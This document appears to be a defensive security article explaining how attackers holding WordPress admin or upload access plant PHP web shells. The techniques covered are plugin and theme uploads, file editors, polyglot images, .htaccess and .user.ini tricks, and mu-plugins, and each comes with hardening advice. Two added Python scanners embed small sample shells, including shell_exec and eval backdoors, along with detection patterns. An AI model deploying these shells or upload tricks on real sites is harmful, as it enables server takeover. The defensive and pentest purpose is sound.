How attackers upload web shells in WordPress without plugin or theme


Are WordPress sites safe as long as you avoid shady plugins and themes? Not necessarily. Once an attacker holds an administrator account, or any other path that lets them write files to the server, WordPress' own features and common server configurations are enough to upload and execute a web shell; no plugin or theme vulnerability is required. Penetration testers use the same tricks to prove impact after a credential compromise. This guide walks through how it is done and what you can do to stop it.


🔍 What Is a Web Shell?

A web shell is a malicious script, usually PHP, that lets an attacker run commands on a server through ordinary HTTP requests. In WordPress, running one means getting a PHP file onto disk (or PHP code into an existing file) and having the web server execute it. None of that needs a plugin or theme vulnerability: the dashboard's own upload and editing features, combined with typical Apache/PHP defaults, are enough for anyone holding an administrator account.


🛠️ Common Methods Hackers Use to Deploy Web Shells in WordPress

Here are the most common attack vectors used by hackers or pentesters with admin access:

1. Uploading a ZIP Plugin via the Dashboard

  • The attacker builds a ZIP containing shell.php plus a minimal plugin file whose header comment (Plugin Name: ...) makes WordPress accept it; the plugin file simply includes shell.php.
  • They upload it via Plugins → Add New → Upload Plugin and activate it. Activation is not even required to use the shell: everything under wp-content/plugins/ is served by the web server, so shell.php can be requested directly once the ZIP is extracted.
  • Protection Tip: Add this line to wp-config.php: define('DISALLOW_FILE_MODS', true); This removes plugin and theme installation, updates and the file editors from the dashboard (media uploads are unaffected). It also disables automatic updates, so updates must then be applied with WP-CLI or your deployment pipeline.

2. Uploading a Malicious Theme

  • The shell code is injected into functions.php or another file of an otherwise legitimate theme, which is then re-zipped.
  • The attacker uploads it via Appearance → Themes → Add New → Upload Theme. Activation is optional: files under wp-content/themes/ are served directly, and once the theme is active its functions.php runs on every request.
  • Protection Tip: Same as above, plus file integrity monitoring on the theme directories. A WAF inspects HTTP traffic and will not notice a modified functions.php on disk.

3. Theme File Editor Exploitation

  • Attackers use Appearance → Theme File Editor to write PHP into functions.php or another existing theme file. The editor cannot create new files such as shell.php, but a backdoor in functions.php runs on every front-end and admin request, which is all an attacker needs.
  • Protection Tip: Disable file editing in wp-config.php: define('DISALLOW_FILE_EDIT', true); (DISALLOW_FILE_MODS already includes this.)

4. Plugin File Editor Abuse

  • Same idea via Plugins → Plugin File Editor, which edits the files of any installed plugin, active or not (code in an inactive plugin still runs when its file is requested directly, unless the file bails out when loaded outside WordPress).
  • The attacker injects PHP into a plugin file that is loaded on every request, typically the main plugin file.
  • Protection Tip: Use the same DISALLOW_FILE_EDIT constant and perform regular file integrity scans.

5. Upload via Media Library + .htaccess Trick

  • Uploads a polyglot: a real image (valid PNG or JPEG) with PHP appended after the end-of-image marker or hidden in metadata. It passes WordPress' image checks because the file is still a valid image.
  • Also uploads a .htaccess into the same folder to force Apache to treat .png or .jpg as PHP. Core's upload filter rejects .htaccess (unknown file type) unless ALLOW_UNFILTERED_UPLOADS is defined or a plugin widens the allowed types, so in practice this step needs a second, weaker upload path (a form plugin, FTP, a writable share).
  • Protection Tip:
    • Set AllowOverride None for wp-content/uploads/ in the server configuration, so a planted .htaccess is ignored entirely.
    • Block access to PHP files in uploads at the server level (Apache 2.4 syntax; Apache 2.2 used Deny from all), and add the equivalent location rule on nginx:
        <FilesMatch "\.(php|phtml|php[0-9]|phar)$">
            Require all denied
        </FilesMatch>

6. Exploiting REST API + Application Passwords

  • Application passwords (WordPress 5.6+) carry the full capabilities of the account they belong to, over HTTP Basic authentication, with no dashboard session and no second factor. With an administrator's application password the REST API can install a plugin from the wordpress.org directory and activate it (POST /wp-json/wp/v2/plugins, for example a file-manager plugin that then provides the upload), and POST /wp-json/wp/v2/media uploads files under the same type checks as the media library; XML-RPC accepts the same credentials for wp.uploadFile. Only wordpress.org plugins can be installed this way; an arbitrary ZIP still needs the dashboard.
  • Protection Tip: Review Users → Profile → Application Passwords for entries you did not create and revoke them; turn the feature off with the wp_is_application_passwords_available filter where no integration needs it. DISALLOW_FILE_MODS also blocks the plugin install endpoint, since it removes the install_plugins capability.

🔧 Advanced Web Shell Techniques

Without dashboard admin access, but with some way to write into wp-content/uploads/ (an Author or Contributor account with upload_files, a form plugin that accepts attachments, leaked FTP or SFTP credentials), attackers fall back on server-side behaviour rather than WordPress features:

Polyglot Files via Media Library

  • Concatenates a valid 1×1 PNG with payload.txt (the PHP) so the image bytes come first and the PHP follows the IEND chunk, then renames the result polyglot.png. It passes image validation, since getimagesize()-style checks stop at the image data.
  • On its own the file does not execute; uploads/ serves it as image/png. It becomes a shell only when the server maps the extension to PHP (next trick) or when existing PHP code includes it.
  • An upload filter that blocks only .php is bypassed with .phtml, .php5 or .phar on servers whose handler mapping covers them (Debian-family Apache configs map .ph(ar|p|tml) to PHP).

MIME Type Exploitation with .htaccess

  • Uploads a .htaccess alongside the image containing: AddType application/x-httpd-php .png
  • Under mod_php with AllowOverride FileInfo (or All) in effect, the .png file with embedded PHP now executes like a regular script. Under PHP-FPM the AddType line does nothing, but a SetHandler directive pointing at the FPM proxy handler achieves the same when overrides are allowed; AllowOverride None defeats both.

PNG/PHAR Polyglot Exploits

  • Injects PHP into image metadata (an EXIF or comment field) with exiftool or by hand; the image stays valid and viewable.
  • A PHAR archive can be prefixed with image bytes and remain a valid archive. It is executed either through an include() of a phar:// path in vulnerable code or, on PHP before 8.0, through any file operation on a phar:// path, which automatically unserialized the archive's metadata and opened the door to object-injection gadgets.

Bypassing .htaccess Restrictions

  • Poisons log files (access or error logs, session files) with PHP and includes them through a vulnerable include() in a theme or plugin (LFI), so no executable extension is ever needed.
  • Drops a .php file directly into wp-content/mu-plugins/ if that folder is writable: every PHP file at its top level (not in subfolders) loads on every request, needs no activation, is listed only under the Must-Use tab and cannot be deactivated from the dashboard.
  • Drops a .user.ini with auto_prepend_file=<path> next to any PHP file. PHP-FPM and CGI read it per directory (re-read after user_ini.cache_ttl, 300 s by default), and the prepended file is included by PHP itself, so it can carry any extension, the polyglot .png included. mod_php ignores .user.ini; there the equivalent is php_value auto_prepend_file in .htaccess.
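The scanner below, as an added example that is not part of the original article, checks an uploads tree for the drop-points from method 5 and the tricks above: PHP-executable extensions, PHP open tags inside image files (appended after the image data or hidden in metadata), and planted .htaccess or .user.ini files carrying handler or auto_prepend_file directives. The sample tree it builds in a temporary directory is constructed for the demonstration, and the extension and directive lists are assumptions about a typical Apache/PHP-FPM setup, not something WordPress defines.

```python
"""Scan a WordPress uploads directory for the drop-points described above.

Added example, not code from the original article. It creates a constructed
uploads tree in a temporary directory (a clean JPEG, a PNG with PHP appended,
an .htaccess that remaps .png to PHP, a .user.ini that prepends that PNG, and a
stray .phtml), then walks the tree and reports what it finds.
"""
import re
import tempfile
from pathlib import Path

# Extensions that common Apache/PHP handler mappings may pass to PHP (assumed list).
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".php8", ".phtml", ".phar", ".phps"}

# Per-directory control files that change how the server or PHP treats the folder,
# and the directives inside them that matter for execution.
CONTROL_PATTERNS = {
    ".htaccess": re.compile(r"^\s*(AddType|AddHandler|SetHandler|php_value|php_flag|php_admin_value)\b", re.I | re.M),
    ".user.ini": re.compile(r"^\s*(auto_prepend_file|auto_append_file)\s*=", re.I | re.M),
}

IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".webp", ".bmp", ".svg"}

# PHP open tags; <?= is always enabled, the bare <? short tag only when short_open_tag=On.
PHP_TAG = re.compile(rb"<\?php\b|<\?=")

# Constructed: PNG signature plus an empty IEND chunk (CRC AE426082). Enough to pass a
# signature sniff; not a renderable image.
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x00IEND\xaeB`\x82"


def scan_uploads(root):
    """Return a list of (relative_posix_path, reason) for every suspicious file under root."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        ext = path.suffix.lower()
        data = path.read_bytes()
        if path.name in CONTROL_PATTERNS:
            reason = "control file in uploads"
            hit = CONTROL_PATTERNS[path.name].search(data.decode("utf-8", "replace"))
            if hit:
                reason += " with directive " + hit.group(1)
            findings.append((rel, reason))
        elif ext in PHP_EXTENSIONS:
            findings.append((rel, "PHP-executable extension " + ext))
        elif ext in IMAGE_EXTENSIONS and PHP_TAG.search(data):
            # Catches payloads appended after IEND/EOI as well as PHP hidden in metadata.
            findings.append((rel, "image contains PHP open tag (polyglot)"))
    return findings


def build_sample_uploads(base):
    """Populate base with a constructed uploads tree: one clean file, four planted drop-points."""
    month = Path(base) / "2024" / "06"
    month.mkdir(parents=True)
    # Clean JPEG: SOI marker, padding, EOI marker.
    (month / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9")
    # Polyglot: the image bytes first, PHP appended after IEND.
    (month / "logo.png").write_bytes(PNG_STUB + b"<?php phpinfo(); ?>")
    # .htaccess that asks mod_php to treat .png as PHP.
    (month / ".htaccess").write_text("AddType application/x-httpd-php .png\n")
    # .user.ini (PHP-FPM/CGI) that prepends the polyglot to every PHP request in this folder.
    (month / ".user.ini").write_text("auto_prepend_file = logo.png\n")
    # Extension that slips past a filter which only blocks .php.
    (Path(base) / "cache.phtml").write_bytes(b"<?php echo 'planted'; ?>")
    return base


def demo():
    """Build the constructed tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_uploads(build_sample_uploads(tmp))


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Point it at a live site with scan_uploads('/var/www/html/wp-content/uploads'). Findings are a starting point for review rather than a verdict: WordPress core never writes .htaccess, .user.ini or PHP into uploads/, but some security plugins place a deny-only .htaccess there, so read the directive before treating a hit as an incident.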

🚫 Shell Execution Without File Uploads

Even if file uploads are completely blocked, attackers may:

  • Store PHP in a setting that an installed plugin evaluates (code-snippet and custom-PHP plugins keep their snippets in the options table and run them on every request), or register a WP-Cron event whose callback runs the payload. Both live in the database, so file integrity scans never see them.
  • Look for any writable path (cache directories, temp folders) or any LFI in a theme or plugin to include a payload that is already on disk.

🧪 Types of PHP Web Shells by Execution Method

  • System shell: Uses system(), exec(), shell_exec(), passthru() or proc_open() to run OS commands. disable_functions in php.ini is the usual control, and a shell will probe for whichever function is left enabled.
  • Eval/assert shells: Execute arbitrary PHP received through POST bodies, cookies or headers. assert() stopped evaluating strings in PHP 8.0, so assert-based shells only work on older PHP.
  • Include shells: include()/require() a remote or attacker-controlled path, the payload often encoded or obfuscated. Remote URLs need allow_url_include=On, which is off by default.
  • PHAR/deserialization: A phar:// path reaches include() or a file function in vulnerable code and the archive's metadata is unserialized.
  • Auto-prepend shell: Runs before every PHP request, via php_value auto_prepend_file in .htaccess (mod_php) or auto_prepend_file in .user.ini (FPM/CGI).
  • GUI shells: Full web-based control panels such as WSO, b374k, R57 and C99, usually heavily obfuscated.
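As an added example (not code from the article), the Python below turns the execution-method list into a triage tool: one regex indicator per shell class, and an inspector that runs them over every member of a plugin ZIP, so a package built the way method 1 describes (a clean-looking loader that includes shell.php, here with a second payload hidden in a .png) is flagged before it is installed. The plugin ZIP and its file names are constructed for the demonstration, and the indicator patterns are assumptions chosen for readability rather than a complete signature set.

```python
"""Triage PHP sources by web-shell execution method and inspect a plugin ZIP.

Added example, not code from the original article. The indicator table follows
the shell classes listed above; the plugin ZIP is constructed in memory in the
shape described under method 1 (an innocuous-looking loader plus an included shell).
"""
import io
import re
import zipfile

# One indicator regex per execution method. This is triage, not a verdict:
# legitimate code also calls some of these (base64_decode, include of a variable path).
SHELL_CLASSES = {
    # OS command execution
    "system": re.compile(r"\b(system|exec|shell_exec|passthru|proc_open|popen)\s*\(", re.I),
    # arbitrary PHP: eval/assert/create_function, or the preg_replace /e modifier
    # (assert() stopped evaluating strings in PHP 8.0; /e was removed in PHP 7.0)
    "eval": re.compile(
        r"\b(eval|assert|create_function)\s*\("
        r"|preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
    # include/require of a variable path or a stream wrapper (http needs allow_url_include)
    "include": re.compile(
        r"\b(include|include_once|require|require_once)\s*\(?\s*"
        r"(\$|['\"](https?|ftp|data|php|phar)://)", re.I),
    "phar": re.compile(r"phar://|\bPhar\s*::|\bnew\s+Phar\b", re.I),
    "auto_prepend": re.compile(r"auto_prepend_file|auto_append_file", re.I),
    # decoders usually wrapped around eval to hide the payload
    "obfuscated": re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev|hex2bin)\s*\(", re.I),
    # names of well-known GUI shells left in code or comments
    "gui_signature": re.compile(r"\bb374k\b|\bwso\b|\br57shell\b|\bc99shell\b", re.I),
}

# Request-controlled input anywhere in the same file (coarse: no data-flow tracking).
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b|php://input|getallheaders\s*\(", re.I)

PHP_SOURCE_EXTS = {"php", "phtml", "inc", "php5", "php7"}


def classify_php(source):
    """Return the set of shell-class labels whose indicators occur in a PHP source string."""
    hits = {name for name, pattern in SHELL_CLASSES.items() if pattern.search(source)}
    if hits and REQUEST_INPUT.search(source):
        hits.add("request_controlled")
    return hits


def inspect_plugin_zip(zip_bytes):
    """Walk a plugin ZIP in memory; return {member_path: sorted labels} for flagged members.

    A member that contains PHP but carries a non-PHP extension gets an extra label,
    since that is the polyglot pattern rather than ordinary plugin code.
    """
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            data = archive.read(info)
            if b"<?php" not in data and b"<?=" not in data:
                continue
            labels = classify_php(data.decode("utf-8", "replace"))
            name = info.filename.rsplit("/", 1)[-1]
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext not in PHP_SOURCE_EXTS:
                labels.add("php_in_non_php_file")
            if labels:
                report[info.filename] = sorted(labels)
    return report


def build_sample_plugin():
    """Constructed plugin ZIP: a loader with a valid header, the shell it requires,
    a clean readme, and a PHP payload hidden in an 'image'. Returns the ZIP bytes."""
    loader = (
        "<?php\n/*\nPlugin Name: Helper Widgets\nVersion: 1.0\n*/\n"
        "require_once __DIR__ . '/shell.php';\n"
    )
    shell = "<?php if (isset($_POST['cmd'])) { echo shell_exec($_POST['cmd']); }\n"
    hidden = "<?php eval(base64_decode($_POST['p'])); ?>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("helper-widgets/helper-widgets.php", loader)
        archive.writestr("helper-widgets/shell.php", shell)
        archive.writestr("helper-widgets/readme.txt", "Helper Widgets\n")
        archive.writestr("helper-widgets/assets/logo.png", hidden)
    return buf.getvalue()


def demo():
    """Inspect the constructed plugin and return the report."""
    return inspect_plugin_zip(build_sample_plugin())


if __name__ == "__main__":
    for member, labels in demo().items():
        print(member, "->", ", ".join(labels))
```

The loader file is deliberately not reported: require_once of a fixed local path is ordinary plugin code, which is why the inspector scans every archive member instead of only the main plugin file. Treat request_controlled as a hint, not proof; the check does no data-flow analysis, so a legitimate plugin that reads $_POST and happens to call base64_decode will produce a false positive that a human has to clear.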

🛡️ Summary & Best Security Practices

To defend against these attacks:

  1. Disable dashboard installs, updates and file edits: define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); in wp-config.php (DISALLOW_FILE_MODS already implies the second, so the second alone is for sites that want to keep dashboard updates). Apply updates with WP-CLI or your deployment pipeline, and remember that media uploads are unaffected.
  2. Prevent PHP execution in wp-content/uploads/ at the web-server level, with AllowOverride None for that tree so a planted .htaccess cannot re-enable it, and set user_ini.filename to an empty value in the PHP-FPM pool so .user.ini files are ignored.
  3. Monitor for file changes with integrity scanning (hash core, plugins and themes against known-good copies), and include mu-plugins and uploads in the scan.
  4. Use a WAF, lock down wp-config.php, require MFA for administrators, restrict admin access by network where possible, and review Application Passwords regularly.
  5. Audit server configuration, not just WordPress: handler mappings, AllowOverride, disable_functions, allow_url_include.